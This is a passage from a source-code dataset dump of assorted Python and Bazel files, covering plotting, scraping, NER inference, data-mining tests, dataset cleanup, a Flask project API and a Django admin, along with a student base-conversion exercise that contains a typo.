legend\n\n max_score = result_df[file_name1].max() * result_df[file_name2].max() # is used in next line\n\n # calculates scores for point size in diagram\n result_df = pd.eval(\"size_score = (result_df[file_name1] * result_df[file_name2])/max_score\", target=result_df)\n\n # overwrite all point sizes < 0.01 with 0.01\n small_freq = result_df.query(\"size_score < @threshold\").index.tolist()\n result_df.loc[small_freq, [\"size_score\"]] = threshold\n\n size_score = result_df[\"size_score\"].tolist()\n\n return [result_df, label, [file_name1, file_name2], size_score]\n","sub_path":"src/kMerScatterPlotData.py","file_name":"kMerScatterPlotData.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"242439778","text":"import os\n\n# Check to make sure all the labels have files\n#f = open(\"deerlabels.txt\", \"r\")\n#for line in f.readlines():\n# fname = line.split()[0].split(\"/\")[2]\n# if not os.path.exists(\"labelled/\" + fname):\n# print(fname)\n\ni = 0\nlab = open(\"templabels.txt\", \"r\")\nl = lab.read()\n#print(l)\n# Check to make sure all the files have labels\nfor f in os.listdir(\"labelled\"):\n af = f + \"\\n\"\n if af not in l:\n os.rename(\"labelled/\" + f, \"otherdeer/\" + f)\n i += 1\nprint(i)\n\n","sub_path":"automl_training/missouri_camtraps/checkfiles.py","file_name":"checkfiles.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"164730198","text":"import re\n\nimport scrapy\n\nfrom scrapy.loader import ItemLoader\nfrom ..items import PrivatItem\nfrom itemloaders.processors import TakeFirst\npattern = r'(\\xa0)?'\n\nclass PrivatSpider(scrapy.Spider):\n\tname = 'privat'\n\tstart_urls = ['https://privatbank.com.cy/en/news/']\n\n\tdef parse(self, response):\n\t\tpost_links = response.xpath('//h2/a/@href').getall()\n\t\tyield from response.follow_all(post_links, self.parse_post)\n\n\t\tnext_page = response.xpath('//a[@title=\"Next →\"]/@href').get()\n\t\tif next_page:\n\t\t\tyield response.follow(next_page, self.parse)\n\n\n\tdef parse_post(self, response):\n\n\t\tdate = response.xpath('//span[@class=\"date\"]/text()').get()\n\t\ttitle = response.xpath('//h1/text()').get()\n\t\tcontent = response.xpath('//div[@class=\"static\"]//text()[not (ancestor::h1)]').getall()\n\t\tcontent = [p.strip() for p in content if p.strip()]\n\t\tcontent = re.sub(pattern, \"\",' '.join(content))\n\n\n\t\titem = ItemLoader(item=PrivatItem(), response=response)\n\t\titem.default_output_processor = TakeFirst()\n\n\t\titem.add_value('title', title)\n\t\titem.add_value('link', response.url)\n\t\titem.add_value('content', content)\n\t\titem.add_value('date', date)\n\n\t\tyield item.load_item()\n","sub_path":"privat/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"393942703","text":"import numpy as np\nfrom data_utils import input_from_line,result_to_json\nimport tensorflow as tf\nimport pickle\nfrom tensorflow.contrib.crf import viterbi_decode\ndef decode( logits, lengths, matrix):\n \"\"\"\n :param logits: [batch_size, num_steps, num_tags]float32, logits\n :param lengths: [batch_size]int32, real length of each sequence\n :param matrix: transaction matrix for inference\n :return:\n \"\"\"\n # inference final labels usa viterbi Algorithm\n paths = []\n small = -1000.0\n start = np.asarray([[small]*13 +[0]])\n for score, length in zip(logits, lengths):\n score = score[:length]\n pad = small * np.ones([length, 1])\n logits = np.concatenate([score, pad], axis=1)\n logits = np.concatenate([start, logits], axis=0)\n path, _ = viterbi_decode(logits, matrix)\n\n paths.append(path[1:])\n return paths\n\nwith open('maps.pkl', \"rb\") as f:\n char_to_id, id_to_char, tag_to_id, id_to_tag = pickle.load(f)\nline='我是中国人'\n_,chars,segs,tags=input_from_line(line,char_to_id)\nprint(chars)\nprint(segs)\n\noutput_graph_path='../model/ner_frozen.pb'\n \nwith tf.Graph().as_default():\n output_graph_def = tf.GraphDef()\n with open(output_graph_path, \"rb\") as f:\n output_graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(output_graph_def, name=\"\")\n\n with tf.Session() as sess:\n char_inputs=sess.graph.get_tensor_by_name('ChatInputs:0')\n seg_inputs=sess.graph.get_tensor_by_name('SegInputs:0')\n dropout= sess.graph.get_tensor_by_name('Dropout:0')\n feed_dict={char_inputs:np.asarray(chars),\n seg_inputs:np.asarray(segs),\n dropout:1.0\n }\n trans_node = sess.graph.get_tensor_by_name(\"crf_loss/transitions:0\")\n lengths_node=sess.graph.get_tensor_by_name('lengths:0')\n logits_node=sess.graph.get_tensor_by_name('project/logits_output:0')\n lengths,logits,trans=sess.run([lengths_node,logits_node,trans_node],feed_dict)\n\nbatch_paths =decode(logits, lengths, trans)\nprint(batch_paths[0])\ntags = [id_to_tag[idx] for idx in batch_paths[0]]\nprint(result_to_json(line, tags))\n \n","sub_path":"experiment-backup/cpp/scripts/freeze_graph_test.py","file_name":"freeze_graph_test.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"198607497","text":"from creation import *\nfrom utils import *\nfrom numUtils import *\n# from config import *\nfrom query import *\nfrom optimization import sway\n\nfrom update import *\nfrom cluster import *\nfrom discretization import *\n\n##################\n### test functions\ndef test_the():\n oo(the)\n\ndef test_rand():\n t = []\n u = []\n\n # global Seed\n # Seed = 1\n for i in range(1, 1000):\n t.append(rint(0, 100, 1))\n for i in range(1, 1000):\n u.append(rint(0, 100, 1))\n \n for n, num in enumerate(t):\n # print(num, u[n])\n assert(num == u[n])\n\ndef test_some():\n the['max'] = 32\n num1 = NUM()\n for i in range(1, 10000):\n add(num1, i)\n # oo(has(num1))\n\ndef test_num():\n num1 = NUM()\n num2 = NUM()\n\n for i in range(1, 10000):\n add(num1, rand())\n\n for i in range(1, 10000):\n add(num2, rand()**2)\n\n print(1, rnd(mid(num1)), rnd(div(num1)))\n print(2, rnd(mid(num2)), rnd(div(num2)))\n return 0.5 == rnd(mid(num1)) and mid(num1) > mid(num2)\n\ndef test_sym():\n sym = adds(SYM(), ['a', 'a', 'a', 'a', 'b', 'b', 'c'])\n print(mid(sym), rnd(div(sym)))\n return 1.38==rnd(div(sym))\n\ndef test_csv():\n global n\n n = 0\n def csv_fun(t):\n global n\n n += len(t)\n csv(the[\"file\"], csv_fun)\n\n return n == 8*399\n\ndef test_data():\n data = DATA.read(the['file'])\n col = data['cols']['x'][0]\n print(col['lo'], col['hi'], mid(col), div(col))\n oo(stats(data))\n\ndef test_clone():\n data1 = DATA.read(the['file'])\n data2 = DATA.clone(data1, data1['rows'])\n\n oo(stats(data1))\n oo(stats(data2))\n\ndef test_cliffs():\n assert False == cliffsDelta([8,7,6,2,5,8,7,3], [8,7,6,2,5,8,7,3]), \"1\"\n assert True == cliffsDelta([8,7,6,2,5,8,7,3], [9,9,7,8,10,9,6]), \"2\"\n t1 = []\n t2 = []\n for i in range(0, 1000):\n t1.append(rand())\n for i in range(0, 1000):\n t2.append(rand()**0.5)\n \n assert False == cliffsDelta(t1, t1), \"3\" \n assert True == cliffsDelta(t1, t2), \"4\"\n diff = False\n j = 1.0\n while not diff:\n def func(x):\n return x*j\n t3 = list(map(func, t1))\n diff = cliffsDelta(t1, t3)\n print(\">\", rnd(j), diff)\n j = j*1.025\n\ndef test_dist():\n data = DATA.read(the['file'])\n num = NUM()\n for row in data['rows']:\n add(num, dist(data, row, data['rows'][1]))\n oo({'lo': num['lo'], 'hi': num['hi'], 'mid': rnd(mid(num)), 'div': rnd(div(num))})\n\ndef test_half():\n data = DATA.read(the['file'])\n left, right, A, B, c = half(data)\n print(len(left), len(right))\n l = DATA.clone(data, left)\n r = DATA.clone(data, right)\n print('l', o(stats(l)))\n print('r', o(stats(r)))\n \ndef test_tree():\n showTree(tree(DATA.read(the['file'])))\n\ndef test_sway():\n data = DATA.read(the['file'])\n best, rest = sway(data)\n print(\"\\nall \", o(stats(data))) \n print(\" \", o(stats(data,div))) \n print(\"\\nbest\", o(stats(best))) \n print(\" \", o(stats(best,div))) \n print(\"\\nrest\", o(stats(rest))) \n print(\" \", o(stats(rest,div))) \n print(\"\\nall ~= best?\", o(diffs(best['cols']['y'], data['cols']['y'])))\n print(\"best ~= rest?\", o(diffs(best['cols']['y'], rest['cols']['y'])))\n\ndef test_bins():\n data = DATA.read(the['file'])\n best, rest = sway(data)\n print('all', '', '', '', o({'best': len(best['rows']), 'rest': len(rest['rows'])}))\n global b4\n for t in (bins(data['cols']['x'], {'best': best['rows'], 'rest': rest['rows']})):\n for range in t:\n if range['txt'] != b4:\n print('')\n b4 = range['txt']\n print(range['txt'], range['lo'], range['hi'], \n rnd(value(range['y']['has'], len(best['rows']), len(rest['rows']), \"best\")), \n o(range['y']['has']))","sub_path":"src/hw5/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"622371783","text":"# -*- mode: python -*-\n\nload(\"@fbcode_macros//build_defs:export_files.bzl\", \"export_file\")\nload(\"@fbcode_macros//build_defs:native_rules.bzl\", \"buck_sh_test\")\nload(\n \"//hphp:DEFS.bzl\",\n \"is_gcc\",\n \"is_opt_hhvm_build\",\n)\n\ndef gdb_python_test(src, cmds = None, extra = []):\n sanitized_name = src.replace(\"/\", \"_\").replace(\":\", \"\")\n test_name = \"gdb_python_test_\" + sanitized_name\n expect_name = sanitized_name + \".expect\"\n if src[0] == \":\":\n srcs = (src, \"\")\n export_file(name = src[1:])\n else:\n srcs = src.split(\"/\", 2)\n srcs[0] = \"//hphp/test:\" + srcs[0]\n srcs[1] = \"/\" + srcs[1]\n\n if cmds == None:\n cmds = sanitized_name + \".cmds\"\n export_file(name = cmds)\n\n export_file(name = expect_name)\n buck_sh_test(\n name = test_name,\n args = [\n \"$(location //hphp/hhvm:hhvm)\",\n \"$(location :\" + cmds + \")\",\n \"$(location //hphp/tools/gdb:pyfiles)/hhvm.py\",\n \"$(location \" + srcs[0] + \")\" + srcs[1],\n \"$(location :\" + expect_name + \")\",\n \"0\" if is_gcc() else \"1\",\n \"1\" if is_opt_hhvm_build() else \"0\",\n \"\" if src[0] == \":\" else \"1\",\n ] + extra,\n test = \"gdb_python_test.sh\",\n )\n","sub_path":"hphp/tools/gdb/gdb-test/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273447004","text":"\"\"\"\nВикористовуючи регулярні вирази, для поданого\nнижче тексту замініть кожне число на його шіснадцяткове представлення.\nВиведіть результат.\n\"\"\"\nimport re\n\ndef read(q):\n x=input(q)\n while not re.match(r'(?:[0]\\.\\d+)|(?:[1-9]\\d*(?:\\.\\d+)?)', x):\n x= input(q)\n return float(x)\n\ndef convert_base(num, to_base=10, from_base=10):\n if isinsance(num, str):\n n = int(num, from_base)\n else:\n n=int(num)\n alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n if n < to_base:\n return alphabet[n]\n else:\n return convert_base(n // to_base, to_base) + alphabet[n % to_base]\n\nnumber = read('Введіть число: ')\nconvert_base(number, to_base=16, from_base=10)","sub_path":"lashtabegav/second/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"570955984","text":"\nimport numpy as np\nimport cv2\nimport os\nimport math\noriginal_dir=\"D:/dataset/comma_c12_uisee_100_102_104_105_115_118_m/img/\"\n\nlabel_dir = \"comma_label_ds.txt\"\n\n\npredict_dir1 = \"prediction_comma_nvNet_5_19.log\"\npredict_dir5 = \"prediction_comma_vgg_fla_pw_3channel_kivinet_5_19.log\"\npredict_dir4 = \"prediction_comma_seg_fla_pw_3channel_kivinet_5_19.log\"\npredict_dir3 = \"prediction_comma_inception5_19.log\"\npredict_dir2 = \"prediction_comma_vgg_transfer_5_19.log\"\ndef angle_filter(angle,filter_size = 11):\n filter = np.ones((1,filter_size),dtype=np.float)/filter_size\n for i in range(filter_size//2,angle.shape[0]-filter_size//2):\n mul = np.matmul(filter,angle[i-filter_size//2:i+filter_size//2+1,:])\n angle[i,:] = mul\n return np.squeeze(angle,axis=1)\nf_label = open(label_dir,'r')\nf_label_lines = f_label.readlines()\nlabel = np.zeros((len(f_label_lines),2))\nfor i,j in enumerate(f_label_lines):\n label[i][0] = float(j.split(\",\")[-2])\n label[i][1] = float(j.split(\",\")[-1])\nf_label.close()\nif False:\n label[:,0] = angle_filter(np.reshape(label[:,0],[-1,1]))\n\nbase = 7680\nindex = 900 #900 230 1375 1800\nk=20\nf_all = []\nf_l = open(label_dir,\"r\").readlines()[index]\nf_p1 = open(predict_dir1,\"r\").readlines()[base+index]\nf_p2 = open(predict_dir2,\"r\").readlines()[base+index]\nf_p3 = open(predict_dir3,\"r\").readlines()[base+index]\nf_p4 = open(predict_dir4,\"r\").readlines()[base+index]\nf_p5 = open(predict_dir5,\"r\").readlines()[base+index]\nf_all.append(f_l)\nf_all.append(f_p1)\nf_all.append(f_p2)\nf_all.append(f_p3)\nf_all.append(f_p4)\nf_all.append(f_p5)\nimg = cv2.imread(original_dir+str(index)+\".jpg\")\nimg = cv2.resize(img,(320,160))\ncolor = [(0,0,255),(0,255,0),(255,0,0),(238, 203, 173),(139, 117, 0),( 0, 165,255)]\nfor id,f in enumerate(f_all):\n if id==0:\n steer = -label[index][0]+0.3\n speed= -label[index][1]\n else:\n steer,speed = f.split(\",\")[-2:]\n steer = -float(steer)+0.3\n speed = -float(speed)\n print(steer)\n if steer>0:\n steer_sqrt = math.sqrt(abs(steer))\n else:\n steer_sqrt = -math.sqrt(abs(steer))\n x = np.array([160,160+0.3*steer_sqrt*k,160+steer_sqrt*k])\n y = np.array([150,100,50])\n poly = np.poly1d(np.polyfit(x, y, 2))\n font = cv2.FONT_HERSHEY_SIMPLEX\n # cv2.putText(img, \"Steer:%.3f\"%steer, (50, 250), font, 0.5, (255, 255, 255), 1)\n # cv2.putText(img, \"Speed:15\", (50, 270), font, 0.5, (255, 255, 255), 1)\n # cv2.line(img,(320+int(steer_sqrt*k),100),(320+int(steer_sqrt*k),120),(0,255,0),5)\n # cv2.line(img,(320+int(steer_sqrt*k),100),(300+int(steer_sqrt*k),100),(0,255,0),5)\n if int(160+steer_sqrt*k)>160:\n mi = int(160+steer_sqrt*k)\n ma = 160\n else:\n ma = int(160+steer_sqrt*k)\n mi = 160\n for i in range(ma,mi,1):\n y_i = int(poly(i) )\n cv2.circle(img, (i, y_i), 2, color[id], 2, 8, 0)\n cv2.imshow(\"img\",img)\n cv2.waitKey()\ncv2.imwrite(\"co_poly/\"+str(index)+\".jpg\",img)\n# cv2.destroyAllWindows()\n\n# alphaReserve = 0.8\n# BChannel = 255\n# GChannel = 0\n# RChannel = 0\n# yMin = 237\n# yMax = 277\n# xMin = 45\n# xMax = 170\n\n# img[yMin:yMax, xMin:xMax, 0] = img[yMin:yMax, xMin:xMax, 0] * alphaReserve + BChannel * (1 - alphaReserve)\n# img[yMin:yMax, xMin:xMax, 1] = img[yMin:yMax, xMin:xMax, 1] * alphaReserve + GChannel * (1 - alphaReserve)\n# img[yMin:yMax, xMin:xMax, 2] = img[yMin:yMax, xMin:xMax, 2] * alphaReserve + RChannel * (1 - alphaReserve)\n\n\n# steer = pred[0][0]\n# k = 100\n# if steer>0:\n# steer_sqrt = math.sqrt(abs(steer))\n# else:\n# steer_sqrt = -math.sqrt(abs(steer))\n# x = np.array([320,320+0.3*steer_sqrt*k,320+steer_sqrt*k])\n# y = np.array([200,150,100])\n# poly = np.poly1d(np.polyfit(x, y, 2))\n# font = cv2.FONT_HERSHEY_SIMPLEX\n# cv2.putText(img, \"Steer:%.3f\"%steer, (50, 250), font, 0.5, (255, 255, 255), 1)\n# cv2.putText(img, \"Speed:15\", (50, 270), font, 0.5, (255, 255, 255), 1)\n# # cv2.line(img,(320+int(steer_sqrt*k),100),(320+int(steer_sqrt*k),120),(0,255,0),5)\n# # cv2.line(img,(320+int(steer_sqrt*k),100),(300+int(steer_sqrt*k),100),(0,255,0),5)\n# if int(320+steer_sqrt*k)<320:\n# mi = int(320+steer_sqrt*k)\n# ma = 320\n# else:\n# ma = int(320+steer_sqrt*k)\n# mi = 320\n# for i in range(mi,ma,1):\n# y_i = int(poly(i) )\n# cv2.circle(img, (i, y_i), 3, ( 197, 205,122), 3, 8, 0)\n# cv2.imshow(\"img\",img)\n# cv2.waitKey()\n# cv2.destroyAllWindows()\n ","sub_path":"comma_offline.py","file_name":"comma_offline.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117931884","text":"import json\r\nimport os\r\n\r\nnameStr = []\r\n\r\nwith open(\"G:\\人_机动车_非机动车\\coco2voc\\COCO_train.json\", \"r+\") as f:\r\n data = json.load(f)\r\n print(\"read ready\")\r\n\r\nfor i in data:\r\n imgName = str(i[\"filename\"]).zfill(12) + \".jpg\"\r\n nameStr.append(imgName)\r\n\r\nnameStr = set(nameStr)\r\nprint(nameStr)\r\nprint(len(nameStr))\r\n\r\npath = \"G:/人_机动车_非机动车/train2017/\"\r\n\r\nfor file in os.listdir(path):\r\n if (file not in nameStr):\r\n os.remove(path + file)","sub_path":"data_tools/coco转voc/删除不需要的图片.py","file_name":"删除不需要的图片.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"630356682","text":"import csv\nimport io\nfrom collections import OrderedDict\nfrom flask import Blueprint, render_template, request, make_response, current_app\nfrom flask_restful import Resource, Api\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\n\nblueprint = Blueprint('red', __name__)\n\nmongo = PyMongo()\n\n\n@blueprint.route('/')\ndef index():\n return render_template('index.html', googlemaps_key=current_app.config['GOOGLEMAPS_KEY'])\n\n\napi = Api()\n\n\ndef jsonify_doc(doc):\n return {\n k: str(v) if isinstance(v, ObjectId) else v\n for k, v in doc.items()\n }\n\n\nclass Project(Resource):\n def get(self, projid):\n return jsonify_doc(\n mongo.db.projects.find_one_or_404(\n {'_id': ObjectId(projid)}\n )\n )\n\n def put(self, projid):\n mongo.db.projects.replace_one(\n {'_id': ObjectId(projid)},\n request.form.to_dict()\n )\n return '', 204\n\n def delete(self, projid):\n mongo.db.projects.delete_one({'_id': ObjectId(projid)})\n return '', 204\n\napi.add_resource(Project, '/projects/<projid>')\n\n\nclass ProjectList(Resource):\n def get(self):\n return [\n jsonify_doc(doc)\n for doc in mongo.db.projects.find()\n ]\n\n def post(self):\n res = mongo.db.projects.insert_one(request.form.to_dict())\n loc = api.url_for(Project, projid=res.inserted_id)\n return loc, 201, {'Location': loc}\n\napi.add_resource(ProjectList, '/projects')\n\n\nFIELD_DISPLAY_NAMES = OrderedDict([\n ('name', 'Project'),\n ('address', 'Address'),\n ('start_date', 'Start Date'),\n ('end_date', 'End Date'),\n ('stage', 'Stage'),\n ('completion', 'Completion'),\n ('psh', 'PSH'),\n ('livework', 'Live/Work'),\n ('affordable', 'Aff. Housing'),\n ('commercial', 'Commercial'),\n ('comments', 'Comments/Updates'),\n])\n\n\ndef value_display(k, v):\n if not v:\n return v\n elif k == 'completion':\n return float(v) * 100\n\n\n@blueprint.route('/csv')\ndef csvdownload():\n buf = io.StringIO()\n dw = csv.DictWriter(buf, FIELD_DISPLAY_NAMES.values())\n dw.writeheader()\n for doc in mongo.db.projects.find():\n dw.writerow({\n FIELD_DISPLAY_NAMES[k]: value_display(k, v)\n for k, v in doc.items() if k in FIELD_DISPLAY_NAMES\n })\n\n r = make_response(buf.getvalue())\n r.headers['Content-Type'] = 'text/csv'\n r.headers['Content-Disposition'] = 'attachment; filename=RED.csv'\n\n return r\n","sub_path":"red/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"597073975","text":"from website.models import Page, Project, Story\nfrom website.views.decorators import api_request\n\n_routes = []\n\n@api_request\ndef get_sitemap(req_handler):\n global _routes\n req_handler.response.prepare(routes=[])\n if(not _routes):\n _routes = [ x.to_route() for x in Page.objects.all() ]\n _routes += [ x.to_route() for x in Project.objects.all() ]\n _routes += [ x.to_route() for x in Story.objects.all() ]\n req_handler.response.set_data({ \"routes\" : _routes })\n return req_handler\n\n","sub_path":"website/views/api/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"202539042","text":"for tc in range(int(input())):\r\n N = int(input())\r\n \r\n events = []\r\n Jfree = -1\r\n Cfree = -1\r\n \r\n output = [''] * N\r\n for i in range(N):\r\n l, r = [int(x) for x in input().split()]\r\n events.append((l, r, i))\r\n \r\n for event in sorted(events):\r\n \r\n if Jfree <= event[0]:\r\n Jfree = event[1]\r\n output[event[2]] = \"J\"\r\n \r\n elif Cfree <= event[0]:\r\n Cfree = event[1]\r\n output[event[2]] = \"C\"\r\n \r\n else:\r\n output = [\"IMPOSSIBLE\"]\r\n break\r\n \r\n print(\"Case #{}: {}\".format(tc + 1, ''.join(output)))\r\n ","sub_path":"Qualification/parenting.py","file_name":"parenting.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"353822911","text":"# -*- coding: utf-8 -*-\nfrom bagogold.acoes.models import Acao, ProventoAcao, AcaoProvento, \\\n OperacaoAcao, UsoProventosOperacaoAcao, OperacaoCompraVenda, HistoricoAcao, \\\n ValorDiarioAcao, TaxaCustodiaAcao\nfrom django.contrib import admin\n\n\nadmin.site.register(Acao)\n\nclass ProventoAcaoAdmin(admin.ModelAdmin):\n search_fields = ['acao__ticker']\n list_display = ('acao', 'tipo_provento', 'valor_unitario', 'data_ex', 'data_pagamento')\n \n def get_queryset(self, request):\n # use our manager, rather than the default one\n qs = self.model.gerador_objects.get_queryset()\n \n # we need this from the superclass method\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\n if ordering:\n qs = qs.order_by(*ordering)\n return qs\n \nadmin.site.register(ProventoAcao, ProventoAcaoAdmin)\n\nadmin.site.register(AcaoProvento)\n \nadmin.site.register(OperacaoAcao)\n\nadmin.site.register(UsoProventosOperacaoAcao)\n\nadmin.site.register(OperacaoCompraVenda)\n\nclass HistoricoAcaoAdmin(admin.ModelAdmin):\n search_fields = ['acao__ticker', 'data']\n list_display = ('acao', 'preco_unitario', 'data', 'oficial_bovespa')\n \nadmin.site.register(HistoricoAcao, HistoricoAcaoAdmin)\n \nadmin.site.register(ValorDiarioAcao)\n \nadmin.site.register(TaxaCustodiaAcao)\n","sub_path":"bagogold/acoes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626977060","text":"import turtle\n\nx0, y0 = eval (input (\"Enter the center of circle: \"))\nradius = int(input(\"Radius of circle: \"))\nx, y = eval(input(\"Enter a point x, y\"))\n\nturtle.penup()\nturtle.goto(x0, y0 - radius)\nturtle.pendown()\nturtle.circle(radius)\n\nturtle.penup()\nturtle.color(\"red\")\nturtle.goto(x,y)\nturtle.begin_fill()\nturtle.circle(2)\nturtle.end_fill()\n\nlength = ((x - x0) ** 2 + (y - y0) ** 2) ** (1/2)\n\nif (length < radius):\n\tprint(\"Inside the circle\")\nelif (length == radius):\n\tprint(\"On the border of circle\")\nelse:\n\tprint(\"Outside the circle\") \n\nturtle.hideturtle()\nturtle.done()\n","sub_path":"insideOrOutsideCircle.py","file_name":"insideOrOutsideCircle.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"183979092","text":"from psycopg2.extras import RealDictCursor, DictCursor\nimport database_common\n\n@database_common.connection_handler\ndef get_all_questions(cursor: RealDictCursor) -> dict:\n query = \"\"\"\n SELECT id, submission_time, view_number, vote_number, title\n FROM question\n ORDER BY submission_time DESC\n \"\"\"\n cursor.execute(query)\n questions = cursor.fetchall()\n return questions\n\n\n@database_common.connection_handler\ndef add_question(cursor: RealDictCursor, sub, view_n, vote_n, title, mess, image, email):\n query_max_id = \"\"\"\n SELECT MAX(id) FROM question\n \"\"\"\n cursor.execute(query_max_id)\n new_id = cursor.fetchone()\n nid = new_id['max']\n query = \"INSERT INTO question \" \\\n \"VALUES ({},'{}',{},{},'{}','{}','{}','{}')\".format(nid+1, sub, view_n, vote_n, title, mess, image, email)\n cursor.execute(query)\n return nid+1\n\n\n@database_common.connection_handler\ndef get_question(cursor: RealDictCursor, question_id: int):\n query = \"\"\"\n SELECT *\n From question\n WHERE id=%(question_id)s \n \"\"\"\n param = {'question_id': str(question_id)}\n cursor.execute(query, param)\n return cursor.fetchone()\n\n\n@database_common.connection_handler\ndef get_question_id(cursor: RealDictCursor, question_id):\n query = \"\"\"\n SELECT id\n From question\n WHERE id = %(question_id)s;\n \"\"\"\n param = {'question_id': question_id}\n cursor.execute(query, param)\n result = cursor.fetchone()\n print(result)\n return result['id']\n\n\n@database_common.connection_handler\ndef save_edit_question(cursor: RealDictCursor, question_id, message, title):\n command = \"\"\"\n UPDATE question \n SET message = (%(message)s), title = (%(title)s)\n WHERE id=%(question_id)s \n \"\"\"\n param = {\n 'message': str(message),\n 'title': str(title),\n 'question_id': str(question_id)\n }\n cursor.execute(command, param)\n return None\n\n\n@database_common.connection_handler\ndef vote_up_question(cursor: RealDictCursor, item_id):\n query = \"\"\"\n UPDATE question\n SET vote_number = vote_number + 1\n WHERE id=%(id)s\n \"\"\"\n param = {'id': item_id}\n cursor.execute(query, param)\n return None\n\n\n@database_common.connection_handler\ndef vote_down_question(cursor: RealDictCursor, item_id):\n query = \"\"\"\n UPDATE question\n SET vote_number = vote_number - 1\n WHERE id=%(id)s\n \"\"\"\n param = {'id': item_id}\n cursor.execute(query, param)\n return None\n\n\n@database_common.connection_handler\ndef delete_question(cursor: RealDictCursor, question_id):\n command1 = \"\"\"\n DELETE\n FROM comment \n WHERE question_id=%(id)s\n \"\"\"\n command2 = \"\"\"\n DELETE\n FROM comment_q \n WHERE question_id=%(id)s \n \"\"\"\n command3 = \"\"\"\n DELETE\n FROM answer\n WHERE question_id=%(id)s\n \"\"\"\n command4 = \"\"\"\n DELETE\n FROM question \n WHERE id=%(id)s \n \"\"\"\n param = {\"id\": str(question_id)}\n cursor.execute(command1, param)\n cursor.execute(command2, param)\n cursor.execute(command3, param)\n cursor.execute(command4, param)\n return None\n\n\n@database_common.connection_handler\ndef get_five_questions(cursor: RealDictCursor) -> dict:\n query = \"\"\"\n SELECT id, submission_time, view_number, vote_number, title\n FROM question\n ORDER by submission_time DESC\n LIMIT 5\n \"\"\"\n cursor.execute(query)\n questions = cursor.fetchall()\n return questions\n\n@database_common.connection_handler\ndef get_user_from_question(cursor: RealDictCursor, question_id):\n query = \"\"\"\n SELECT user_id\n From question\n WHERE id = %(question_id)s;\n \"\"\"\n param = {'question_id': question_id}\n cursor.execute(query, param)\n result = cursor.fetchone()\n print(result)\n return result['user_id']","sub_path":"questions_data.py","file_name":"questions_data.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"79700380","text":"#!/usr/bin/env python3.7\n# coding=utf-8\nimport os\nimport sys\nimport socket\nimport daemon\nimport logging\nimport getopt\n\nimport config\n\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"ds:\", [\"debug\", \"signal=\"])\nexcept getopt.GetoptError:\n print('uqed-cli -d -s <signal_str>')\n sys.exit(2)\n\nrun_in_debug = False\nsignal_str = ''\nfor opt, arg in opts:\n if opt in ('-d', '--debug'):\n run_in_debug = True\n elif opt in ('-s', '--signal'):\n signal_str = arg\n\n\ndef run_quant_engine(ipc_path, use_stdout=False):\n from qev1 import QuantEngine\n if use_stdout:\n stream = sys.stdout\n else:\n stream = open('qev1.log', mode='w')\n logging.basicConfig(stream=stream,\n format='%(levelname)s # %(processName)s : %(message)s',\n level=config.logginglevel)\n\n import strategy_ma\n\n strategy_obj = strategy_ma.Ma_pos_Strategy()\n strategy_obj.init_strategy_data()\n\n qe = QuantEngine(strategy_obj, mock_execution=config.mock_execution)\n qe.run(ipc_path)\n\n\nipc_path = './qed.ipc'\nif not os.path.exists(ipc_path):\n if run_in_debug:\n print('start quant engine in debug mode')\n run_quant_engine(None, True)\n else:\n print('start quant engine in daemon')\n context = daemon.DaemonContext(working_directory='./')\n with context:\n run_quant_engine(ipc_path)\nelse:\n if signal_str:\n message = signal_str.encode('utf-8')\n print('send signal string:{}'.format(signal_str))\n else:\n print('stop quant engine!')\n message = b'stop'\n\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n sock.connect(ipc_path)\n except socket.error as msg:\n print(msg)\n sys.exit(1)\n\n # send ipc cmd\n sock.sendall(message)\n sock.close()\n\n os.unlink(ipc_path)\n","sub_path":"uqed-cli.py","file_name":"uqed-cli.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"288875216","text":"# -*- coding: utf-8 -*-\n\"\"\"The Trend Micro AV Logs file event formatter.\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom plaso.formatters import 